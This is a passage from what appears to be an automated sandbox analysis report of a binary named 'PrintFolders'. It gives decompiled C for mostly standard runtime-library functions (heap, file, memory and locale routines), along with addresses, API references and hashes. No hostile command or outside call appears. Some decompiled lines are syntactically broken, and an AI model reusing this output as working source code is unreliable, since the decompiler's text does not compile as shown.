					_t26 = E0042869E( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t26 != 0) {
						goto L3;
					} else {
						 *0x45061c =  *0x45061c + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a16 + 8)) = 0;
						 *((intOrPtr*)(_a16 + 0x1c)) = 0;
						 *((intOrPtr*)(_a16 + 4)) = 0;
						 *_a16 = 0;
						 *((intOrPtr*)(_a16 + 0x10)) = _v8;
						return _a16;
					}
				}
			}

0x0041e0ca
0x0041e0d6
0x0041e0d7
0x0041e0d8
0x0041e0df
0x0041e138
0x0041e13b
0x0041e0e1
0x0041e0f3
0x0041e0fd
0x00000000
0x0041e0ff
0x0041e102
0x0041e10e
0x0041e116
0x0041e11c
0x0041e122
0x0041e128
0x0041e130
0x0041e137
0x0041e137
0x0041e0fd

APIs

__wsopen_s.LIBCMT ref: 0041E0F3

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: d4cc4cf86e9e065f416ef9d63789a222c11f165fcbbbb45fb3f736e95baad7dc
Instruction ID: 50b409054a80a02bec94d94242d16b3902a0bf72dd6f6a78c9df47ee9ec44d07
Opcode Fuzzy Hash: d4cc4cf86e9e065f416ef9d63789a222c11f165fcbbbb45fb3f736e95baad7dc
Instruction Fuzzy Hash: 39111575A0420AAFCF05DF59E9419DF7BF5EF48314F04406AF809AB351D670EA11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00428630 Relevance: 1.5, APIs: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00428630(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t22;
				void* _t25;
				signed int _t28;
				signed int _t29;

				_t25 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(E00419D5B(_t25, _a12,  &_v28, E00423B18(__edx, __eflags)) == 0) {
					_push(_a28);
					_t22 = E004286BE(_t25, __eflags, _a4, _a8, _v20, _a16, _a20, _a24); // executed
					_t29 = _t22;
				} else {
					_t29 = _t28 | 0xffffffff;
				}
				if(_v8 != 0) {
					E0041E2B8(_v20);
				}
				return _t29;
			}

0x00428630
0x0042863b
0x0042863e
0x00428641
0x00428644
0x00428647
0x0042864a
0x00428664
0x0042866b
0x00428680
0x00428688
0x00428666
0x00428666
0x00428666
0x0042868e
0x00428693
0x00428698
0x0042869d

APIs

_free.LIBCMT ref: 00428693

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 521115d978e45e608ea96acc4bbcbcaa1d0163517ca36d6091db2ee742d9455d
Instruction ID: 460fcbff9e95d3aa1796ce0ff75d521f962e5269c53dc2fc002039b783f7abde
Opcode Fuzzy Hash: 521115d978e45e608ea96acc4bbcbcaa1d0163517ca36d6091db2ee742d9455d
Instruction Fuzzy Hash: EC018472D0116DBFCF01AFA89C019DE7FB5BF08304F54016AFD14E2191E6358A60DB95

Uniqueness

Uniqueness Score: -1.00%

Function 1000873B Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000873B(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E10006406(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x10018340, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E1000B780();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E100068A9(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x10008741
0x10008747
0x10008779
0x1000877e
0x10008784
0x00000000
0x10008784
0x1000874b
0x1000874d
0x1000874d
0x10008764
0x1000876d
0x10008775
0x00000000
0x00000000
0x10008755
0x10008757
0x00000000
0x00000000
0x10008760
0x10008762
0x00000000
0x00000000
0x10008762
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,10003243,?,?,100024B8,0007A120), ref: 1000876D

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9bc71e6e4ec6e68a8c2aed3646502ff683cefb7352d8620f7e826d587402586a
Instruction ID: 67f11896f8f7d2121f3f4df057540a061ed8fd880985c25efa2fb590a71935ec
Opcode Fuzzy Hash: 9bc71e6e4ec6e68a8c2aed3646502ff683cefb7352d8620f7e826d587402586a
Instruction Fuzzy Hash: 82E0E53524D6216AF751D6618C4474A3A88FB413F0F324120FE8C9208CDE64DE0083E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED2F Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041ED2F(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E004135F1(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x450ce0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0041C6D1();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E0041A10C(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x0041ed35
0x0041ed3b
0x0041ed6d
0x0041ed72
0x0041ed78
0x00000000
0x0041ed78
0x0041ed3f
0x0041ed41
0x0041ed41
0x0041ed58
0x0041ed61
0x0041ed69
0x00000000
0x00000000
0x0041ed49
0x0041ed4b
0x00000000
0x00000000
0x0041ed54
0x0041ed56
0x00000000
0x00000000
0x0041ed56
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5231c26b2e5400a8b445dea9dc5c14e3c1ee74f90dcd341e6a6c6bc4848ff768
Instruction ID: 959c84357b1a9f0ee529832ae90eed3ec28ec96ce801b17d18c686e8694df61b
Opcode Fuzzy Hash: 5231c26b2e5400a8b445dea9dc5c14e3c1ee74f90dcd341e6a6c6bc4848ff768
Instruction Fuzzy Hash: 95E06539141222A7E6313767BD01BDB76599F467A4F150123FC45962A1CA5CCCC185AE

Uniqueness

Uniqueness Score: -1.00%

Function 00428377 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00428377(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}

0x00428394
0x0042839b

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00428767,?,?,00000000,?,00428767,00000000,0000000C), ref: 00428394

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b718aefa274249b92c0224c2ff73fbbbd694e56a9348850d4764fd55e00e249d
Instruction ID: 6a3501348c7adacfcd1c424c20773ecf10769bdff7a35cf21c7a2e113d4d802e
Opcode Fuzzy Hash: b718aefa274249b92c0224c2ff73fbbbd694e56a9348850d4764fd55e00e249d
Instruction Fuzzy Hash: 19D06C3210014DFBDF128F85DC06EDA3BAAFB48714F014010BA1856060C772E822AB95

Uniqueness

Uniqueness Score: -1.00%

Function 100069B0 Relevance: 1.5, APIs: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100069B0(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E10008701(_a4); // executed
				return _t5;
			}

0x100069b9
0x100069c3
0x100069ca

APIs

_free.LIBCMT ref: 100069C3

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 4a8faf65200c92b95d684da80c623e720def96cf622f0f76f7dc9a0cc9b61c85
Instruction ID: c6a98ba0e5363ae005110d363abbfc5d7111903c5cce904da764f3f1e972a342
Opcode Fuzzy Hash: 4a8faf65200c92b95d684da80c623e720def96cf622f0f76f7dc9a0cc9b61c85
Instruction Fuzzy Hash: 8CC08C31000208FBDB00CB41C846A4E7BA8EB803A4F300044F40417240CAB2FF009A90

Uniqueness

Uniqueness Score: -1.00%

Function 00402E90 Relevance: 1.3, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E90(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}

0x00402e9f
0x00402ea6

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E9F

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 213a422f90c8c6353df42cf4beb6bca1ece7b85540c8c8c994e7d48a5d8c3a30
Instruction ID: b31a385f3b57fd4fd7166e142863b1bbbb6af29b0bf7193fe4047b5eb220286a
Opcode Fuzzy Hash: 213a422f90c8c6353df42cf4beb6bca1ece7b85540c8c8c994e7d48a5d8c3a30
Instruction Fuzzy Hash: CAC0483200020DFBCF025F82EC048DA3F2AFB08261B408024FA1C04030C7739972ABAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402EB0 Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402EB0(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}

0x00402ebc
0x00402ec3

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 00402EBC

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 9e517827ee14b2795f6c39b1ac259b67fb15a98946d76ce23e4192bd4712f48a
Instruction ID: bdb844541333acea6d7cc9b38086a4600084955ffe6c4e25b5f0fe259d46e886
Opcode Fuzzy Hash: 9e517827ee14b2795f6c39b1ac259b67fb15a98946d76ce23e4192bd4712f48a
Instruction Fuzzy Hash: E4B0483200020CBB8F021F82EC048993F2AFB08260B448420FA180502087729522AB84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00426D9F Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E00426D9F(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E0041CB63(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E00426D32(0x4328d0, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E004266A3(_t84, _t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E004267C3();
					} else {
						E0042672A(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E00426D32("\xef\xbf\xbd)C", 0x40,						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E004267C3();
							} else {
								E0042672A(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E00426BEF(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x2
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // -1
							_t47 = E004251DD(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00413544();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x43d054; // 0x7bd02ead
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E0041CB63(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E0041CB63(_t97, _t114) + 0x34c);
								_t127 = E004274DA(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E004239E2(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E0042760C(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return E0040EBBF(_t62, _t88, _v32 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E0041E821(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E0041E821(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E0042C127(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E0041E821(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E0042C127(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E00413338(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E004251DD(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00426da4
0x00426da5
0x00426da7
0x00426dac
0x00426db3
0x00426db5
0x00426db8
0x00426db8
0x00426dbb
0x00426dbb
0x00426dc1
0x00426dc4
0x00426dc7
0x00426dc7
0x00426dca
0x00426dcd
0x00426dcf
0x00426dd5
0x00426dd7
0x00426ddc
0x00426de6
0x00426deb
0x00426ded
0x00426df0
0x00426df0
0x00426df2
0x00426df6
0x00426e3f
0x00000000
0x00426df8
0x00426dfd
0x00426e06
0x00426dff
0x00426dff
0x00426dff
0x00426e11
0x00426e1b
0x00426e20
0x00426e25
0x00426e2b
0x00426e2f
0x00426e38
0x00426e31
0x00426e31
0x00426e31
0x00426e44
0x00426e44
0x00426e25
0x00426e11
0x00426e4a
0x00426f86
0x00426f86
0x00000000
0x00426e50
0x00426e50
0x00426e59
0x00426e6a
0x00426e60
0x00426e60
0x00426e60
0x00426e71
0x00426e75
0x00000000
0x00426e99
0x00426e99
0x00426e9e
0x00426ea0
0x00426ea0
0x00426ea2
0x00426ea7
0x00426f81
0x00426f83
0x00426f88
0x00426f8c
0x00426ead
0x00426ead
0x00426eb0
0x00426eb0
0x00426eb8
0x00426ebb
0x00426ebb
0x00426ebe
0x00426ebe
0x00426ec1
0x00426ec4
0x00426ece
0x00426ed8
0x00426edd
0x00426ee2
0x00426f8d
0x00426f8f
0x00426f90
0x00426f91
0x00426f92
0x00426f93
0x00426f94
0x00426f99
0x00426f9d
0x00426fa5
0x00426fac
0x00426faf
0x00426fb0
0x00426fb4
0x00426fb5
0x00426fba
0x00426fc2
0x00426fd1
0x00426fdd
0x00426fee
0x00426ff6
0x00427010
0x0042701d
0x00427020
0x00427023
0x00427023
0x0042702d
0x00426ff8
0x00426ff8
0x00426ffa
0x00426ffa
0x00427033
0x00427034
0x00427037
0x0042703e
0x00426ee8
0x00426ef8
0x00000000
0x00426efe
0x00426f00
0x00426f00
0x00426f0c
0x00426f1a
0x00000000
0x00426f1c
0x00426f1c
0x00426f1f
0x00426f25
0x00426f28
0x00426f38
0x00426f3d
0x00426f4b
0x00000000
0x00000000
0x00000000
0x00000000
0x00426f2a
0x00426f2a
0x00426f2d
0x00426f33
0x00426f36
0x00426f4d
0x00426f4d
0x00426f59
0x00426f79
0x00000000
0x00426f5b
0x00426f5b
0x00426f65
0x00426f6a
0x00426f6f
0x00000000
0x00426f71
0x00000000
0x00426f71
0x00426f6f
0x00000000
0x00000000
0x00000000
0x00426f36
0x00426f28
0x00426f1a
0x00426ef8
0x00426ee2
0x00426ea7
0x00426e75

APIs

Part of subcall function 0041CB63: GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,74CB6490,?,0041828D,00405D9E,00000000), ref: 0041CB68
Part of subcall function 0041CB63: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,74CB6490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06

GetACP.KERNEL32(?,?,?,?,?,?,0041B763,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00426E60
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0041B763,?,?,?,00000055,?,-00000050,?,?), ref: 00426E8B
_wcschr.LIBVCRUNTIME ref: 00426F1F
_wcschr.LIBVCRUNTIME ref: 00426F2D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00426FEE

Strings

utf8, xrefs: 00426F5D
)C, xrefs: 00426E16

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8$)C
API String ID: 4147378913-3322961178
Opcode ID: 20ef76e225b801900a59ab0872716af096e09f6a96c791c1d4433a4f633c1a20
Instruction ID: eed4488de9b567759dd5ff52785522d47d8f7e060e054a56165183b34d5168a2
Opcode Fuzzy Hash: 20ef76e225b801900a59ab0872716af096e09f6a96c791c1d4433a4f633c1a20
Instruction Fuzzy Hash: 2C711935B00222AADB24AF35ED42BB773A8EF44704F56406BF905D7281EB7CE941875D

Uniqueness

Uniqueness Score: -1.00%

Function 00427700 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00427700(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x43d054; // 0x7bd02ead
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E0041CB63(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E0041CB63(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x4329e4; // 0x17
					E0042769F(_t89, 0, 0x4328d0, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E00427041(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E00427127(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E0042752B(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E0040EBBF(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E0041E91F(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E0041E91F(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E00413338(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x4328cc; // 0x41
						_t75 = E0042769F(_t89, _t97, "\xef\xbf\xbd)C", _t73 - 1						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E00427127(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E0042708C(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E0042708C(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}

0x00427708
0x0042770f
0x00427716
0x0042771a
0x0042771e
0x0042772c
0x00427731
0x00427732
0x00427733
0x00427734
0x0042773c
0x0042773e
0x00427744
0x0042774a
0x0042774d
0x0042774f
0x00427752
0x00427756
0x0042775d
0x0042776a
0x0042776f
0x00427772
0x00427775
0x00427775
0x00427777
0x0042777a
0x0042777e
0x004277ee
0x004277f0
0x004277f2
0x00427805
0x00427805
0x0042780c
0x00427812
0x00427815
0x00000000
0x00427815
0x004277f4
0x004277f7
0x00000000
0x00000000
0x004277fd
0x00427802
0x00000000
0x00427785
0x00427785
0x00427789
0x0042779b
0x0042779f
0x004277a4
0x004277a8
0x004277a9
0x00427831
0x00427831
0x00427833
0x0042783f
0x00427849
0x0042784d
0x0042784f
0x00427820
0x00427820
0x00427822
0x00427830
0x00427830
0x00427855
0x0042785b
0x0042785d
0x00000000
0x00000000
0x00427864
0x0042786a
0x0042786c
0x00000000
0x00000000
0x0042786e
0x00427871
0x00427873
0x00427875
0x00427875
0x00427886
0x0042788b
0x0042788d
0x004278ed
0x004278ef
0x00000000
0x004278ef
0x00427892
